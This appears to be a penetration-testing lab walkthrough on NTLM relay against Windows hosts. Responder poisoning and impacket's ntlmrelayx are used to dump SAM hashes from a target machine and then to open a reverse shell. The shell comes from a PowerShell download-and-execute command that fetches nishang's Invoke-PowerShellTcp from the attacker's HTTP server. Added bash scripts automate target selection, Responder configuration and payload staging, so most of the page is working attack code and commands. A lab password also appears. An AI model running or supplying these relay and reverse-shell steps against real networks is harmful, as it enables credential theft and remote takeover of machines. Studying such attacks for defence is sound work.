# NTLM Relay

Suppose a domain user is a local Administrator on some other computer. If we can capture an NTLM authentication from that user and relay it to that computer, we inherit her privileges there: we can dump the SAM hashes or even execute remote commands. Two conditions apply: the target must not require SMB signing (a signed session cannot be relayed), and the authentication cannot be relayed back to the machine it came from.

For example, in this lab the user Sara Ardila is a local Administrator on Carlos Villamizar's computer (PC-CARLOS). We confirm it with crackmapexec, which marks the hosts where the credentials have admin rights with `(Pwn3d!)`:

```bash
crackmapexec smb 10.10.10.0/24 -u 'sara.ardila' -p 'Sar@91082'
```

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FkoQclBcxdTJNbhPEgyxk%2Fimage.png?alt=media&#x26;token=42cee19e-c713-4635-a075-6499c2ba8f70" alt=""><figcaption></figcaption></figure>

## Extract SAM hashes

We need to create a file of targets, one IP or hostname per line (in this case only PC-CARLOS). Every host in it must have SMB signing disabled or not required, otherwise the relayed session is rejected:

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FHKxSOlK1X53cDAdsF98A%2Fimage.png?alt=media&#x26;token=a3853a2a-a8c4-4cc9-8e0f-ccac3042c04e" alt=""><figcaption></figcaption></figure>

Then edit Responder's configuration (`Responder.conf`) and turn the SMB and HTTP servers `Off`, so Responder only poisons name resolution and the incoming authentication reaches ntlmrelayx instead of Responder's own servers:

> From here <https://github.com/lgandx/Responder>

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FjqJVDWTDAfh6zgKhCK2G%2Fimage.png?alt=media&#x26;token=f82fa837-1f47-45a7-a0b0-fe4670e28b53" alt=""><figcaption></figcaption></figure>

```bash
sudo python3 Responder/Responder.py -I eth0
```

Now, execute ntlmrelayx (from impacket). With no command given, it dumps the SAM of every target it manages to authenticate to:

```bash
python3 ntlmrelayx.py -tf targets.txt -smb2support
```

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FEdCrJraXWNim2c1Ptxya%2Fimage.png?alt=media&#x26;token=2ccd8b72-6a4d-458c-a66f-40826906500e" alt=""><figcaption></figcaption></figure>
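The setup above, as an added example that is not part of the original page or of the Responder/impacket projects: a bash script that builds `targets.txt` from crackmapexec output, keeping only the hosts that report `signing:False`, and turns the SMB and HTTP servers off in a copy of `Responder.conf`. The crackmapexec output and the configuration file contents are constructed stand-ins; the real files have more lines but the same fields.

```bash
#!/usr/bin/env bash
# Added example, not from the original page or from Responder/impacket:
# prepare the two inputs the relay needs, (1) a target list limited to hosts
# that do not require SMB signing, (2) a Responder.conf with SMB/HTTP off.
set -euo pipefail

# Constructed sample of `crackmapexec smb 10.10.10.0/24` output. Hostnames,
# IPs and builds are made up; the per-host "(signing:...)" token is what the
# real tool prints and what we key on.
CME_SAMPLE='SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:lab.local) (signing:True) (SMBv1:False)
SMB         10.10.10.20     445    PC-CARLOS        [*] Windows 10.0 Build 19041 x64 (name:PC-CARLOS) (domain:lab.local) (signing:False) (SMBv1:False)
SMB         10.10.10.21     445    PC-SARA          [*] Windows 10.0 Build 19041 x64 (name:PC-SARA) (domain:lab.local) (signing:False) (SMBv1:False)'

# Print the IP (second column) of every host with signing not enforced.
# A signing:True host, typically the DC, would reject the relayed session.
gen_relay_targets() {            # usage: gen_relay_targets "$cme_output"
  printf '%s\n' "$1" | awk '/\(signing:False\)/ { print $2 }'
}

# Turn the SMB and HTTP servers off in a Responder.conf so Responder only
# poisons names and the inbound authentication goes to ntlmrelayx instead.
# HTTPS is left alone: the pattern anchors on "HTTP" followed by "=".
responder_disable_smb_http() {   # usage: responder_disable_smb_http <conf>
  sed -E 's/^(SMB|HTTP)[[:space:]]*=[[:space:]]*On[[:space:]]*$/\1 = Off/' "$1" > "$1.tmp"
  mv "$1.tmp" "$1"
}

# Report the current SMB/HTTP values, e.g. "SMB=Off HTTP=Off", as a sanity check.
responder_state() {              # usage: responder_state <conf>
  awk -F'=' '/^SMB[[:space:]]*=/ {s=$2} /^HTTP[[:space:]]*=/ {h=$2}
             END {gsub(/ /,"",s); gsub(/ /,"",h); print "SMB=" s " HTTP=" h}' "$1"
}

main() {
  local work; work=$(mktemp -d)
  gen_relay_targets "$CME_SAMPLE" > "$work/targets.txt"
  # Constructed stand-in for the [Responder Core] section of Responder.conf.
  cat > "$work/Responder.conf" <<'EOF'
[Responder Core]
; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
EOF
  responder_disable_smb_http "$work/Responder.conf"
  echo "relay targets ($work/targets.txt):"; cat "$work/targets.txt"
  echo "Responder servers: $(responder_state "$work/Responder.conf")"
  # Then, in two terminals:
  #   sudo python3 Responder/Responder.py -I eth0
  #   python3 ntlmrelayx.py -tf "$work/targets.txt" -smb2support
}
main
```

crackmapexec can also write the list directly with `crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt`; the reason to filter on `signing:False` either way is that a host requiring signing (a domain controller by default) will refuse the relayed session and only produces noise in the ntlmrelayx output.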

Knowing that Sara is an administrator on PC-CARLOS, we wait for her machine to authenticate to something: a share, a scheduled task, a mapped drive. When a name cannot be resolved through DNS, Windows falls back to LLMNR/NBT-NS broadcasts, and Responder answers those with our own address. Sara's machine then authenticates to us, and ntlmrelayx forwards that NTLM exchange to PC-CARLOS, where it is accepted with Sara's privileges.

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2F6ytUTSPIc8DzGqVyoZtX%2Fimage.png?alt=media&#x26;token=5240b359-f09a-4ea4-b36a-72cb9a58cb50" alt=""><figcaption></figcaption></figure>

In Responder:

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FeJMPrxFQFjo1ttHQbgTB%2Fimage.png?alt=media&#x26;token=d5c307a3-a38d-4664-9d67-04c9ae656bf8" alt=""><figcaption></figcaption></figure>

And ntlmrelayx:

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FtO51HFHrey0FuGtfPDQb%2Fimage.png?alt=media&#x26;token=c0d6646e-50ed-420a-b2aa-4713a40dc3d1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FrIpCo5AAtuTjEPDPgX9z%2Fimage.png?alt=media&#x26;token=e8091074-c4d3-4ec3-aff8-5f9c31446e40" alt=""><figcaption></figcaption></figure>

ntlmrelayx dumps the SAM hashes of PC-CARLOS. These are the NT hashes of the local accounts, which can be used as they are for Pass-The-Hash against that host.

## Execute remote commands

Invoke-PowerShellTcp.ps1 comes from nishang <https://github.com/samratashok/nishang>:

```bash
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 ipst.ps1
```

Take line 20, the example invocation from the script's help block:

```powershell
19 │ .EXAMPLE
20 │ PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
```

Append that invocation to the bottom of the file and replace the IP and port with our listener (172.16.200.7 and 4460 below):

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2Fi6fAG9ZQybsNOSnSOZf9%2Fimage.png?alt=media&#x26;token=c1ab11b7-91ea-477c-8cbf-4a4e220fd019" alt=""><figcaption></figcaption></figure>

Now, serve that file over HTTP and start a listener on port 4460 to receive the PowerShell reverse shell:

```bash
➧ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

```bash
➧ nc -lvp 4460
listening on [any] 4460 ...
```

Now, execute ntlmrelayx with `-c`, so that instead of dumping the SAM it runs our command on the target:

```bash
python3 ntlmrelayx.py -tf targets.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://172.16.200.7:8000/ipst.ps1')"
```

The relayed session runs PowerShell on PC-CARLOS, which downloads `ipst.ps1` from our server and evaluates it with `IEX`. Because the invocation we appended is the last line of the script, `Invoke-PowerShellTcp` is defined and then immediately called, and the reverse shell connects back to our listener.
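The payload staging above, as an added example that is not part of the original page or of nishang/impacket: a bash script that appends the invocation to a copy of `Invoke-PowerShellTcp.ps1` and builds the `-c` string for ntlmrelayx from a single pair of LHOST/LPORT variables, so the script, the download URL and the listener cannot drift apart. The listener values are the page's; the stub script written in `main` is a constructed stand-in for the real nishang file.

```bash
#!/usr/bin/env bash
# Added example, not from the original page or from nishang/impacket: stage
# the reverse-shell script and derive every value (appended call, download
# URL, listener port) from one LHOST/LPORT pair.
set -euo pipefail

LHOST=172.16.200.7   # our HTTP server and nc listener (as on this page)
LPORT=4460           # port for `nc -lvp`
HTTP_PORT=8000       # default of `python3 -m http.server`

# Copy the nishang script and append the .EXAMPLE invocation with our values.
# Because the call is the last line, IEX defines the function and then runs it.
stage_shell() {      # usage: stage_shell <source ps1> <output ps1>
  cp "$1" "$2"
  printf '\nInvoke-PowerShellTcp -Reverse -IPAddress %s -Port %s\n' "$LHOST" "$LPORT" >> "$2"
}

# The command ntlmrelayx runs on the target with -c. The single quotes belong
# to PowerShell; the whole string is passed to ntlmrelayx inside double quotes.
relay_command() {    # usage: relay_command <script name served over HTTP>
  printf "powershell IEX(New-Object Net.WebClient).downloadString('http://%s:%s/%s')" \
    "$LHOST" "$HTTP_PORT" "$1"
}

# Sanity check before relaying: the staged script must contain exactly one
# invocation pointing at our listener, otherwise no shell comes back.
staged_ok() {        # usage: staged_ok <staged ps1>; returns 0 when consistent
  [ "$(grep -c "^Invoke-PowerShellTcp -Reverse -IPAddress $LHOST -Port $LPORT\$" "$1")" -eq 1 ]
}

main() {
  local work; work=$(mktemp -d)
  # Constructed stand-in for /opt/nishang/Shells/Invoke-PowerShellTcp.ps1.
  printf 'function Invoke-PowerShellTcp { param($IPAddress, $Port, [switch]$Reverse) }\n' \
    > "$work/Invoke-PowerShellTcp.ps1"
  stage_shell "$work/Invoke-PowerShellTcp.ps1" "$work/ipst.ps1"
  staged_ok "$work/ipst.ps1" && echo "staged: $(tail -n 1 "$work/ipst.ps1")"
  # The three terminals, all consistent with LHOST/LPORT:
  echo "(cd $work && python3 -m http.server $HTTP_PORT)"
  echo "nc -lvp $LPORT"
  echo "python3 ntlmrelayx.py -tf targets.txt -smb2support -c \"$(relay_command ipst.ps1)\""
}
main
```

Run it once to print the three commands, then paste each into its own terminal; if the appended line or the `-c` URL ever needs a different host, change `LHOST` in one place rather than editing the script, the listener and the ntlmrelayx command separately.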

Now, start Responder again (remember, with SMB and HTTP `Off` in `Responder.conf`):

```bash
sudo python3 Responder/Responder.py -I eth0
```

Wait for Sara's machine to try to reach a service, task or folder whose name does not resolve (a mistyped share, a stale mapped drive, a task pointing at a decommissioned host):

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FakXwkPBanQmJQgbh4J2w%2Fimage.png?alt=media&#x26;token=7d6e0e31-2e1c-442d-9663-6f8cdea6226c" alt=""><figcaption></figcaption></figure>

In our listener:

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FNcn0ZjUJwsJs7myu4m5N%2Fimage.png?alt=media&#x26;token=f02d4485-8b58-4848-a97c-5ca648caa4b9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FZHtCgCQ4Dt1NIkVU7c11%2Fimage.png?alt=media&#x26;token=2bc80414-64fb-4552-aa00-c51758b72867" alt=""><figcaption></figcaption></figure>

We are inside PC-CARLOS, with a shell that runs under the privileges Sara holds there.
